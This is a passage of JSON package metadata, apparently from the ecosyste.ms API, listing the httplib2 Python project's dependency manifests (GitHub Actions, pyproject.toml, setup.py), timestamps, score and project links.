ue,"kind":"composite","optional":false},{"id":6876109884,"package_name":"actions/setup-python","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"pypi","filepath":"pyproject.toml","sha":null,"kind":"manifest","created_at":"2024-06-18T12:23:46.546Z","updated_at":"2024-06-18T12:23:46.546Z","repository_link":"https://github.com/httplib2/httplib2/blob/master/pyproject.toml","dependencies":[]},{"ecosystem":"pypi","filepath":"setup.py","sha":null,"kind":"manifest","created_at":"2024-06-18T12:23:46.598Z","updated_at":"2024-06-18T12:23:46.598Z","repository_link":"https://github.com/httplib2/httplib2/blob/master/setup.py","dependencies":[]}],"score":33.198757754044024,"created_at":"2026-05-04T06:49:25.418Z","updated_at":"2026-08-25T14:17:18.802Z","avatar_url":"https://github.com/httplib2.png","language":"Python","codemeta":null,"publiccode":null,"project_url":"https://summary.ecosyste.ms/api/v1/projects/371807","html_url":"https://summary.ecosyste.ms/projects/371807"}